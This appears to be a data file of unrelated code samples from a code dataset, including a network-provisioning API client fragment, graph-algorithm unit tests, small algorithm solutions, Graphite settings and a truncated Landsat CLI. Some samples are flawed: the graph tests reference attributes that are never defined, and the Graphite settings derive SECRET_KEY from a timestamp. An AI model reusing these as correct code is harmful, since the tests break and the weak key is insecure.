self._container_op(container_name, 'new_container', parent_name,\n                                  parent_key, 'add')\n\n    def delete_container(self, container_name, container_key, parent_name,\n                         parent_key):\n        ''' Delete the container from the specified parent.\n\n        Args:\n            container_name (str): Container name\n            container_key (str): Container key\n            parent_name (str): Parent container name\n            parent_key (str): Parent container key\n\n        Returns:\n            response (dict): A dict that contains a status and a list of\n                task ids created (if any).\n\n                Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n        '''\n        self.log.debug('delete_container: container: %s container_key: %s '\n                       'parent: %s parent_key: %s' %\n                       (container_name, container_key, parent_name,\n                        parent_key))\n        return self._container_op(container_name, container_key, parent_name,\n                                  parent_key, 'delete')\n\n    def get_parent_container_for_device(self, device_mac):\n        ''' Return the parent container for the device.\n\n        Args:\n            device_mac (str): Device mac address\n\n        Returns:\n            response (dict): A dict that contains the parent container info\n        '''\n        self.log.debug('get_parent_container_for_device: called for %s'\n                       % device_mac)\n        data = self.clnt.get('/provisioning/searchTopology.do?'\n                             'queryParam=%s&startIndex=0&endIndex=0'\n                             % device_mac, timeout=self.request_timeout)\n        if data['total'] > 0:\n            cont_name = data['netElementContainerList'][0]['containerName']\n            return self.get_container_by_name(cont_name)\n        return None\n\n    def move_device_to_container(self, app_name, device, container,\n                                 create_task=True):\n        ''' Move the device to the specified container.\n\n        Args:\n            app_name (str): String to specify info/signifier of calling app\n            device (dict): Device info\n            container (dict): Container info\n            create_task (bool): Determines whether or not to execute a save\n                and create the tasks (if any)\n\n        Returns:\n            response (dict): A dict that contains a status and a list of\n                task ids created (if any).\n\n                Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n        '''\n        info = '%s moving device %s to container %s' % (app_name,\n                                                        device['fqdn'],\n                                                        container['name'])\n        self.log.debug('Attempting to move device %s to container %s'\n                       % (device['fqdn'], container['name']))\n        if 'parentContainerId' in device:\n            from_id = device['parentContainerId']\n        else:\n            parent_cont = self.get_parent_container_for_device(device['key'])\n            from_id = parent_cont['key']\n        data = {'data': [{'info': info,\n                          'infoPreview': info,\n                          'action': 'update',\n                          'nodeType': 'netelement',\n                          'nodeId': device['key'],\n                          'toId': container['key'],\n                          'fromId': from_id,\n                          'nodeName': device['fqdn'],\n                          'toName': container['name'],\n                          'toIdType': 'container',\n                          'childTasks': [],\n                          'parentTask': ''}]}\n        try:\n            self._add_temp_action(data)\n        # pylint: disable=invalid-name\n        except CvpApiError as e:\n            if 'Data already exists' in str(e):\n                self.log.debug('Device %s already in container %s'\n                               % (device['fqdn'], container))\n        if create_task:\n            return self._save_topology_v2([])\n\n    def search_topology(self, query, start=0, end=0):\n        ''' Search the topology for items matching the query parameter.\n\n        Args:\n            query (str): Query parameter which is the name of the container\n                or device.\n            start (int): Start index for the pagination. Default is 0.\n            end (int): End index for the pagination. If end index is 0\n                then all the records will be returned. 
Default is 0.\n\n Returns:\n response (dict): A dict that contains the container and\n netelement lists.\n '''\n self.log.debug('search_topology: query: %s start: %d end: %d' %\n (query, start, end))\n data = self.clnt.get('/provisioning/searchTopology.do?queryParam=%s&'\n 'startIndex=%d&endIndex=%d'\n % (urllib.quote_plus(query), start, end),\n timeout=self.request_timeout)\n return data\n\n def check_compliance(self, node_key, node_type):\n ''' Check that a device is in compliance, that is the configlets\n applied to the device match the devices running configuration.\n\n Args:\n node_key (str): The device key.\n node_type (str): The device type.\n\n Returns:\n response (dict): A dict that contains the results of the\n compliance check.\n '''\n self.log.debug('check_compliance: node_key: %s node_type: %s' %\n (node_key, node_type))\n data = {'nodeId': node_key, 'nodeType': node_type}\n return self.clnt.post('/provisioning/checkCompliance.do', data=data,\n timeout=self.request_timeout)\n\n def get_images(self, start=0, end=0):\n ''' Return a list of all images.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n images (dict): The 'total' key contains the number of images,\n the 'data' key contains a list of images and their info.\n '''\n self.log.debug('Get info about images')\n return self.clnt.get('/image/getImages.do?queryparam=&startIndex=%d&'\n 'endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_image_bundles(self, start=0, end=0):\n ''' Return a list of all image bundles.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n image bundles (dict): The 'total' key contains the number of\n image bundles, the 'data' key contains a list of image\n bundles and their info.\n '''\n self.log.debug('Get image bundles that can be applied to devices or'\n ' containers')\n return self.clnt.get('/image/getImageBundles.do?queryparam=&'\n 'startIndex=%d&endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_image_bundle_by_name(self, name):\n ''' Return a dict of info about an image bundle.\n\n Args:\n name (str): Name of image bundle to return info about.\n\n Returns:\n image bundle (dict): Dict of info specific to the image bundle\n requested or None if the name requested doesn't exist.\n '''\n self.log.debug('Attempt to get image bundle %s' % name)\n try:\n image = self.clnt.get('/image/getImageBundleByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n except CvpApiError as error:\n # Catch an invalid task_id error and return None\n if 'Entity does not exist' in str(error):\n self.log.debug('Bundle with name %s does not exist' % name)\n return None\n raise error\n return image\n\n def apply_image_to_device(self, image, device, create_task=True):\n ''' Apply an image bundle to a device\n\n Args:\n image (dict): The image info.\n device (dict): Info about device to apply image to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). 
Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.apply_image_to_element(image, device, device['fqdn'],\n 'netelement', create_task)\n\n def apply_image_to_container(self, image, container, create_task=True):\n ''' Apply an image bundle to a container\n\n Args:\n image (dict): The image info.\n container (dict): Info about container to apply image to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.apply_image_to_element(image, container, container['name'],\n 'container', create_task)\n\n def apply_image_to_element(self, image, element, name, id_type,\n create_task=True):\n ''' Apply an image bundle to a device or container.\n\n Args:\n image (dict): The image info.\n element (dict): Info about element to apply image to. Dict\n can contain device info or container info.\n name (str): Name of element image is being applied to.\n id_type (str): Id type of element image is being applied to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n self.log.debug('Attempt to apply %s to %s %s' % (image['name'],\n id_type, name))\n info = 'Apply image: %s to %s %s' % (image['name'], id_type, name)\n data = {'data': [{'info': info,\n 'infoPreview': info,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'imagebundle',\n 'nodeId': image['id'],\n 'toId': element['key'],\n 'toIdType': id_type,\n 'fromId': '',\n 'nodeName': image['name'],\n 'fromName': '',\n 'toName': name,\n 'childTasks': [],\n 'parentTask': ''}]}\n self._add_temp_action(data)\n if create_task:\n return self._save_topology_v2([])\n\n def remove_image_from_device(self, image, device):\n ''' Remove the image bundle from the specified device.\n\n Args:\n image (dict): The image info.\n device (dict): The device info.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.remove_image_from_element(image, device, device['fqdn'],\n 'netelement')\n\n def remove_image_from_container(self, image, container):\n ''' Remove the image bundle from the specified container.\n\n Args:\n image (dict): The image info.\n container (dict): The container info.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.remove_image_from_element(image, container,\n container['name'], 'container')\n\n def remove_image_from_element(self, image, element, name, id_type):\n ''' Remove the image bundle from the specified device or container.\n\n Args:\n image (dict): The image info.\n element (dict): The device or container info.\n name (str): Name of the element the image is removed from.\n id_type (str): Id type of the element the image is removed from.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n 
self.log.debug('Attempt to remove %s from %s' % (image['name'], name))\n info = 'Remove image: %s from %s' % (image['name'], name)\n data = {'data': [{'info': info,\n 'infoPreview': info,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'imagebundle',\n 'nodeId': '',\n 'toId': element['key'],\n 'toIdType': id_type,\n 'fromId': '',\n 'nodeName': '',\n 'fromName': '',\n 'toName': name,\n 'ignoreNodeId': image['id'],\n 'ignoreNodeName': image['name'],\n 'childTasks': [],\n 'parentTask': ''}]}\n self._add_temp_action(data)\n return self._save_topology_v2([])\n\n def deploy_device(self, device, container, configlets=None, image=None, create_task=True):\n ''' Move a device from the undefined container to a target container.\n Optionally apply device-specific configlets and an image.\n\n Args:\n device (dict): Device info\n container (str): name of container to move device to\n configlets (list): list of dicts with configlet key/name pairs\n image (str): name of image to apply to device\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n info = 'Deploy device %s to container %s' % (device['fqdn'], container)\n self.log.debug(info)\n container_info = self.get_container_by_name(container)\n # Add action for moving device to specified container\n self.move_device_to_container('Deploy device', device, container_info,\n create_task=False)\n # Get proposed configlets device will inherit from container it is\n # being moved to.\n prop_conf = self.clnt.get('/provisioning/getTempConfigsByNetElementId.'\n 'do?netElementId=%s' % device['key'])\n new_configlets = prop_conf['proposedConfiglets']\n if configlets:\n new_configlets.extend(configlets)\n self.apply_configlets_to_device('deploy_device', device,\n new_configlets, create_task=False)\n # Apply image to the device\n if image:\n image_info = self.get_image_bundle_by_name(image)\n self.apply_image_to_device(image_info, device, create_task=False)\n if create_task:\n return self._save_topology_v2([])\n","sub_path":"cvprac/cvp_api.py","file_name":"cvp_api.py","file_ext":"py","file_size_in_byte":49511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"483849515","text":"\"\"\"\nMatrix implementation and its arithmetics\n\"\"\"\n\nclass Matrix:\n \"\"\"\n >>> m1 = Matrix(2, 2, [1,2,3,4])\n >>> m2 = Matrix(2, 2, [4,3,2,1])\n >>> m1.product(m2)\n >>> m1.data\n [[8, 5], [20, 13]]\n \"\"\"\n\n def __init__(self, m, n, array):\n self.m = m\n self.n = n\n self.data = [[0]*n for i in range(m)]\n self._build(array)\n\n def _build(self, array):\n k = 0\n for i in range(self.m):\n for j in range(self.n):\n self.data[i][j] = array[k]\n k += 1\n\n def product(self, m2):\n data = [[0]*m2.n for i in range(self.m)]\n for i in range(self.m):\n for j in range(m2.n):\n cij = 0\n for k in range(self.n):\n cij += self.data[i][k] * m2.data[k][j]\n data[i][j] = cij\n self.data = data\n","sub_path":"special_topics/math/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"445441782","text":"import unittest\nfrom grafo_adj_nao_dir import Grafo\n\nclass TestGrafo(unittest.TestCase):\n\n def setUp(self):\n # Paraíba graph\n self.g_p = Grafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\n #{'a1':'J-C', 'a2':'C-E', 'a3':'C-E', 'a4':'C-P', 'a5':'C-P', 'a6':'C-M', 'a7':'C-T', 
'a8':'M-T', 'a9':'T-Z'}\n self.g_p.adicionaAresta('J-C', 3)\n self.g_p.adicionaAresta('C-E', 3)\n self.g_p.adicionaAresta('C-E', 2)\n self.g_p.adicionaAresta('C-P', 1)\n self.g_p.adicionaAresta('C-P', 7)\n self.g_p.adicionaAresta('C-M', 5)\n self.g_p.adicionaAresta('C-T', 4)\n self.g_p.adicionaAresta('M-T', 3)\n self.g_p.adicionaAresta('T-Z', 4)\n\n\n # Paraíba graph without parallel edges\n self.g_p_sem_paralelas = Grafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\n self.g_p_sem_paralelas.adicionaAresta('J-C', 3)\n self.g_p_sem_paralelas.adicionaAresta('C-E', 6)\n self.g_p_sem_paralelas.adicionaAresta('C-P', 7)\n self.g_p_sem_paralelas.adicionaAresta('C-M', 4)\n self.g_p_sem_paralelas.adicionaAresta('C-T', 4)\n self.g_p_sem_paralelas.adicionaAresta('M-T',8)\n self.g_p_sem_paralelas.adicionaAresta('T-Z', 9)\n\n # Complete graphs\n #self.g_c = Grafo(['J', 'C', 'E', 'P'], {'a1':'J-C', 'a3':'J-E', 'a4':'J-P', 'a6':'C-E', 'a7':'C-P', 'a8':'E-P'})\n self.g_c = Grafo(['J', 'C', 'E', 'P'])\n self.g_c.adicionaAresta('J-C', 4)\n self.g_c.adicionaAresta('J-E', 2)\n self.g_c.adicionaAresta('J-P', 1)\n self.g_c.adicionaAresta('C-E', 5)\n self.g_c.adicionaAresta('C-P', 8)\n self.g_c.adicionaAresta('E-P', 3)\n\n\n g = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n g.adicionaVertice(i)\n g.adicionaAresta(\"a-g\", 4)\n g.adicionaAresta(\"a-b\", 9)\n g.adicionaAresta(\"b-c\", 6)\n g.adicionaAresta(\"b-h\", 7)\n g.adicionaAresta(\"b-g\", 10)\n g.adicionaAresta(\"c-d\", 8)\n g.adicionaAresta(\"c-f\", 8)\n g.adicionaAresta(\"d-e\", 14)\n g.adicionaAresta(\"c-e\", 12)\n g.adicionaAresta(\"e-f\", 2)\n g.adicionaAresta(\"f-h\", 2)\n g.adicionaAresta(\"f-g\", 1)\n\n\n g2 = Grafo([], {})\n\n g2.adicionaVertice('a')\n g2.adicionaVertice('b')\n g2.adicionaVertice('c')\n g2.adicionaVertice('d')\n g2.adicionaVertice('e')\n g2.adicionaVertice('f')\n\n g2.adicionaAresta(\"a-b\", 9)\n g2.adicionaAresta(\"b-c\", 6)\n\n g2.adicionaAresta(\"c-d\", 8)\n g2.adicionaAresta(\"c-f\", 8)\n g2.adicionaAresta(\"d-e\", 14)\n g2.adicionaAresta(\"c-e\", 12)\n g2.adicionaAresta(\"e-f\", 2)\n\n g3 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g3.adicionaVertice(i)\n g3.adicionaAresta(\"a-g\", 5)\n g3.adicionaAresta(\"a-b\", 19)\n g3.adicionaAresta(\"b-c\", 16)\n g3.adicionaAresta(\"b-g\", 13)\n g3.adicionaAresta(\"c-d\", 19)\n g3.adicionaAresta(\"c-f\", 1)\n g3.adicionaAresta(\"d-e\", 21)\n g3.adicionaAresta(\"c-e\", 30)\n g3.adicionaAresta(\"e-f\", 15)\n g3.adicionaAresta(\"f-g\", 3)\n\n g4 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm']:\n g4.adicionaVertice(i)\n g4.adicionaAresta(\"a-g\", 5)\n g4.adicionaAresta(\"a-b\", 19)\n g4.adicionaAresta(\"b-c\", 16)\n g4.adicionaAresta(\"b-g\", 13)\n g4.adicionaAresta(\"c-d\", 19)\n g4.adicionaAresta(\"c-f\", 1)\n g4.adicionaAresta(\"d-e\", 21)\n g4.adicionaAresta(\"c-e\", 30)\n g4.adicionaAresta(\"e-f\", 15)\n g4.adicionaAresta(\"f-g\", 3)\n g4.adicionaAresta(\"g-m\", 5)\n g4.adicionaAresta(\"i-k\", 1)\n g4.adicionaAresta(\"a-m\", 14)\n g4.adicionaAresta(\"j-l\", 9)\n g4.adicionaAresta(\"i-m\", 8)\n g4.adicionaAresta(\"f-i\", 11)\n g4.adicionaAresta(\"f-h\", 10)\n g4.adicionaAresta(\"c-e\", 13)\n g4.adicionaAresta(\"e-j\", 20)\n g4.adicionaAresta(\"f-k\", 19)\n\n g5 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n g5.adicionaVertice(i)\n g5.adicionaAresta(\"a-g\", 4)\n g5.adicionaAresta(\"a-b\", 9)\n g5.adicionaAresta(\"b-c\", 6)\n g5.adicionaAresta(\"b-h\", 7)\n g5.adicionaAresta(\"b-g\", 
10)\n g5.adicionaAresta(\"c-d\", 8)\n g5.adicionaAresta(\"c-f\", 8)\n g5.adicionaAresta(\"d-e\", 14)\n g5.adicionaAresta(\"c-e\", 12)\n g5.adicionaAresta(\"e-f\", 2)\n g5.adicionaAresta(\"f-h\", 2)\n g5.adicionaAresta(\"f-g\", 1)\n\n g6 = Grafo([], {})\n\n g6.adicionaVertice('a')\n g6.adicionaVertice('b')\n g6.adicionaVertice('c')\n g6.adicionaVertice('d')\n g6.adicionaVertice('e')\n g6.adicionaVertice('f')\n\n g6.adicionaAresta(\"a-b\", 9)\n g6.adicionaAresta(\"b-c\", 6)\n\n g6.adicionaAresta(\"c-d\", 8)\n g6.adicionaAresta(\"c-f\", 8)\n g6.adicionaAresta(\"d-e\", 14)\n g6.adicionaAresta(\"c-e\", 12)\n g6.adicionaAresta(\"e-f\", 2)\n\n g7 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g7.adicionaVertice(i)\n g7.adicionaAresta(\"a-c\", 50)\n g7.adicionaAresta(\"a-d\", 49)\n g7.adicionaAresta(\"b-f\", 55)\n g7.adicionaAresta(\"b-g\", 60)\n g7.adicionaAresta(\"c-d\", 45)\n g7.adicionaAresta(\"c-g\", 52)\n g7.adicionaAresta(\"d-f\", 44)\n g7.adicionaAresta(\"c-g\", 56)\n g7.adicionaAresta(\"e-f\", 10)\n\n\n g8 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g8.adicionaVertice(i)\n g8.adicionaAresta(\"a-b\", 5)\n g8.adicionaAresta(\"a-e\", 12)\n g8.adicionaAresta(\"b-g\", 4)\n g8.adicionaAresta(\"b-f\", 9)\n g8.adicionaAresta(\"c-d\", 10)\n g8.adicionaAresta(\"c-f\", 7)\n g8.adicionaAresta(\"d-f\", 8)\n g8.adicionaAresta(\"c-e\", 10)\n g8.adicionaAresta(\"e-g\", 2)\n g8.adicionaAresta(\"f-g\", 6)\n\n def test_vertices_nao_adjacentes(self):\n self.assertEqual(self.g_p.vertices_nao_adjacentes(), ['J-J', 'J-E', 'J-P', 'J-M', 'J-T', 'J-Z', 'C-C', 'C-Z', 'E-E', 'E-P', 'E-M', 'E-T', 'E-Z', 'P-P', 'P-M', 'P-T', 'P-Z', 'M-M', 'M-Z', 'T-T', 'Z-Z'])\n\n self.assertEqual(self.g_c.vertices_nao_adjacentes(), ['J-J', 'C-C', 'E-E', 'P-P'])\n\n self.assertEqual(self.g_c3.vertices_nao_adjacentes(), ['J-J'])\n\n def test_ha_laco(self):\n self.assertFalse(self.g_p.ha_laco())\n self.assertFalse(self.g_p_sem_paralelas.ha_laco())\n self.assertTrue(self.g_l1.ha_laco())\n self.assertTrue(self.g_l2.ha_laco())\n self.assertTrue(self.g_l3.ha_laco())\n self.assertTrue(self.g_l4.ha_laco())\n self.assertTrue(self.g_l5.ha_laco())\n\n def test_grau(self):\n # Paraíba\n self.assertEqual(self.g_p.grau('J'), 1)\n self.assertEqual(self.g_p.grau('C'), 7)\n self.assertEqual(self.g_p.grau('E'), 2)\n self.assertEqual(self.g_p.grau('P'), 2)\n self.assertEqual(self.g_p.grau('M'), 2)\n self.assertEqual(self.g_p.grau('T'), 3)\n self.assertEqual(self.g_p.grau('Z'), 1)\n\n # Complete graphs\n self.assertEqual(self.g_c.grau('J'), 3)\n self.assertEqual(self.g_c.grau('C'), 3)\n self.assertEqual(self.g_c.grau('E'), 3)\n self.assertEqual(self.g_c.grau('P'), 3)\n\n # With loops. 
Each loop counts only once per vertex when computing the degree\n self.assertEqual(self.g_l1.grau('A'), 3)\n self.assertEqual(self.g_l2.grau('B'), 3)\n self.assertEqual(self.g_l4.grau('D'), 1)\n\n def test_arestas_ha_paralelas(self):\n self.assertTrue(self.g_p.ha_paralelas())\n self.assertFalse(self.g_p_sem_paralelas.ha_paralelas())\n self.assertFalse(self.g_c.ha_paralelas())\n self.assertFalse(self.g_c3.ha_paralelas())\n self.assertTrue(self.g_l1.ha_paralelas())\n\n def test_arestas_sobre_vertice(self):\n #{'a1': 'J-C', 'a2': 'C-E', 'a3': 'C-E', 'a4': 'C-P', 'a5': 'C-P', 'a6': 'C-M', 'a7': 'C-T', 'a8': 'M-T',\n # 'a9': 'T-Z'}\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('J')), set(['J-C']))\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('C')), set(['C-J', 'C-E', 'C-E', 'C-P', 'C-P', 'C-M', 'C-T']))\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('M')), set(['M-C', 'M-T']))\n\n def test_eh_completo(self):\n self.assertFalse(self.g_p.eh_completo())\n self.assertFalse((self.g_p_sem_paralelas.eh_completo()))\n self.assertTrue((self.g_c.eh_completo()))\n self.assertTrue((self.g_c.eh_completo()))\n self.assertTrue((self.g_c3.eh_completo()))\n self.assertFalse((self.g_l1.eh_completo()))\n self.assertFalse((self.g_l2.eh_completo()))\n self.assertFalse((self.g_l3.eh_completo()))\n self.assertTrue((self.g_l4.eh_completo()))\n self.assertTrue((self.g_l5.eh_completo()))\n\n def test_kruskal(self):\n self.assertEqual(self.g_p_sem_paralelas.Kruskal(), ['J-C', 'C-M', 'M-T', 'T-Z'])\n self.assertEqual(self.g3.Kruskal(), ['c-f', 'f-g', 'a-g', 'b-g', 'e-f', 'd-e'])\n self.assertEqual(self.g4.Kruskal(), ['c-f', 'i-k', 'f-g', 'a-g', 'g-m', 'j-l', 'b-g', 'e-f', 'd-e'])\n self.assertEqual(self.g5.Kruskal(), ['f-g', 'e-f', 'a-g', 'b-c', 'c-d', 'd-e'])\n self.assertEqual(self.g6.Kruskal(), ['e-f', 'b-c', 'c-d', 'a-b', 'd-e'])\n self.assertEqual(self.g7.Kruskal(), ['e-f', 'd-f', 'c-d', 'a-d', 'b-f'])\n self.assertEqual(self.g8.Kruskal(), ['e-g', 'b-g', 'a-b', 'f-g', 'c-f', 'd-f'])","sub_path":"Graphs/Kruskal/grafo_test.py","file_name":"grafo_test.py","file_ext":"py","file_size_in_byte":9141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"102532761","text":"from math import sqrt\n\ndef summation(n):\n\tdictionary = {}\n\tmax_n = n\n\n\n\tdef proper_divisors(n):\n\t\tdictionary[n] = 1\n\t\tfor i in range(int(sqrt(n))):\n\t\t\tif (i + 1) ** 2 == n:\n\t\t\t\tdictionary[n] += i + 1\n\t\t\telif n % (i + 2) == 0:\n\t\t\t\tdictionary[n] += (i + 2) + n//(i + 2)\n\n\tnumbers = []\n\tnegate = []\n\tdef is_amicable(n):\n\t\tnonlocal numbers, negate\n\n\t\tif n not in numbers:\n\t\t\tkey = dictionary[n]\n\t\t\tif key in negate:\n\t\t\t\treturn False\n\t\t\telif n == key or key >= max_n:\n\t\t\t\tnegate += [n]\n\t\t\t\treturn False\n\t\t\telif dictionary[key] == n:\n\t\t\t\tnumbers += [n, key]\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tnegate += [n]\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tsum_n = 0\n\tfor i in range(max_n):\n\t\tproper_divisors(i)\n\n\tfor i in range(max_n):\n\t\tif is_amicable(i):\n\t\t\tsum_n += i\n\n\treturn sum_n\n\nprint(summation(10000))","sub_path":"resource/code-samples/project-euler/0307P21.py","file_name":"0307P21.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"547182224","text":"__author__ = 'July'\n'''\n# https://github.com/kamyu104/LeetCode/blob/master/Python/paint-house.py\nThere are a 
row of n houses, each house can be painted with one of the three colors: red, blue or green.\nThe cost of painting each house with a certain color is different. You have to paint all the houses such that no two adjacent houses have the same color.\n\nThe cost of painting each house with a certain color is represented by a n x 3 cost matrix.\nFor example, costs[0][0] is the cost of painting house 0 with color red; costs[1][2] is the cost of painting house 1 with color green, and so on... Find the minimum cost to paint all houses.\n\nNote:\nAll costs are positive integers.\n\nHide Company Tags LinkedIn\n\n'''\n\n# Time: O(n)\n# Space: O(1)\n\nclass Solution(object):\n def minCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n if not costs:\n return 0\n\n min_costs = [costs[0], [0,0,0]]\n n = len(costs)\n for i in xrange(1, n):\n min_costs[i % 2][0] = costs[i][0] + min(min_costs[(i-1) % 2][1], min_costs[(i-1) % 2][2] )\n min_costs[i % 2][1] = costs[i][1] + min(min_costs[(i-1) % 2][0], min_costs[(i-1) % 2][2] )\n min_costs[i % 2][2] = costs[i][2] + min(min_costs[(i-1) % 2][0], min_costs[(i-1) % 2][1] )\n\n return min(min_costs[(n-1)%2])\n\n\n# Time: O(n)\n# Space: O(n)\nclass Solution2(object):\n def minCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n if not costs:\n return 0\n n = len(costs)\n for i in xrange(1, n):\n costs[i][0] += min(costs[i-1][1], costs[i-1][2])\n costs[i][1] += min(costs[i-1][0], costs[i-1][2])\n costs[i][2] += min(costs[i-1][0], costs[i-1][1])\n\n return min(costs[n-1])\n\n#java\njs = '''\npublic class Solution {\n public int minCost(int[][] costs) {\n if (costs == null || costs.length == 0 || costs[0].length != 3) {\n return 0;\n }\n int numOfHouse = costs.length;\n int[][] dp = new int[2][3];\n for (int i = 0; i < numOfHouse; i++) {\n for (int j = 0; j < 3; j++) {\n dp[i % 2][j] = Math.min(dp[(i + 1) % 2][(j + 1) % 3], dp[(i + 1) % 2][(j + 2) % 3]) + costs[i][j];\n }\n }\n return Math.min(Math.min(dp[(numOfHouse + 1) % 2][0], dp[(numOfHouse + 1) % 2][1]), dp[(numOfHouse + 1) % 2][2]);\n }\n}\n'''","sub_path":"z-refer_git/PythonPrac-/cs15211/PaintHouse.py","file_name":"PaintHouse.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"596776580","text":"\"\"\" Hoare partition scheme Quick Sort\"\"\"\n\n# partition the array\ndef partition(array, left, right):\n pivot = array[(left+right)//2]; # choose the middle element as pivot\n\n # scan from both ends and swap out-of-place elements in a loop\n while left <= right:\n while array[left] < pivot: \n left+=1; # skip elements already on the correct (left) side \n while array[right] > pivot: \n right-=1; # skip elements already on the correct (right) side \n\n # swap elements and move left and right indices\n if left <= right:\n array[left], array[right] = array[right], array[left]\n left+=1\n right-=1\n return left;\n\n# divide array into halves\ndef quick_sort(array, left, right):\n if left < right:\n pivot = partition(array, left, right)\n quick_sort(array, left, pivot - 1)\n quick_sort(array, pivot + 1, right)\n\n# testing the algorithm\nprint(\"\\nHoare partition scheme------\")\nprint(\"Quick sort O(nlogn) algorithm:\\n\")\n\n# array before sorting\narray = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(\"Array before sorting\")\nprint(array)\n\n# test the quick sort algorithm\nprint(\"Array after sorting\")\nquick_sort(array, 0, len(array)-1)\nprint(array)","sub_path":"Algorithms 
Techniques/1. Sorting and Selection/quick-sort/quickSortHoare.py","file_name":"quickSortHoare.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"422502123","text":"import os\nfrom datetime import datetime\n\nLOG_DIR = '/var/log/graphite'\nif os.getenv(\"CARBONLINK_HOSTS\"):\n CARBONLINK_HOSTS = os.getenv(\"CARBONLINK_HOSTS\").split(',')\n\nif os.getenv(\"CLUSTER_SERVERS\"):\n CLUSTER_SERVERS = os.getenv(\"CLUSTER_SERVERS\").split(',')\n\nif os.getenv(\"MEMCACHE_HOSTS\"):\n MEMCACHE_HOSTS = os.getenv(\"MEMCACHE_HOSTS\").split(',')\n\nif os.getenv(\"WHISPER_DIR\"):\n WHISPER_DIR = os.getenv(\"WHISPER_DIR\")\n\nCARBONLINK_QUERY_BULK = True\n\nSECRET_KEY = str(datetime.now())\n","sub_path":"web/config/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"12968303","text":"import os\n\nimport click\nimport pystac\n\nfrom stactools.landsat.utils import transform_stac_to_stac\nfrom stactools.landsat.stac import create_stac_item\n\n\ndef create_landsat_command(cli):\n \"\"\"Creates a command group for working\n with Landsat metadata from USGS' Collection 2\n \"\"\"\n @cli.group(\n 'landsat',\n short_help=(\"Commands for working with Landsat Collection 2 metadata.\")\n )\n def landsat():\n pass\n\n @landsat.command(\n \"create-item\",\n short_help=\"Create a STAC item from collection 2 scene metadata.\")\n @click.option(\"--level\",\n type=click.Choice(['level-1', 'level-2'],\n case_sensitive=False),\n default=\"level-2\",\n show_default=True,\n help=\"Product level to process\")\n @click.option(\"--mtl\", required=True, help=\"HREF to an MTL file.\")\n @click.option(\"--output\",\n required=True,\n help=\"HREF of directory in which to write the item.\")\n def create_item_cmd(level: str, mtl: str, output: str):\n \"\"\"Creates a STAC Item for a Landsat 8 C2 Level-2 scene's products.\n\n All asset paths are based on the MTL path, as all assets are assumed to\n reside in the same 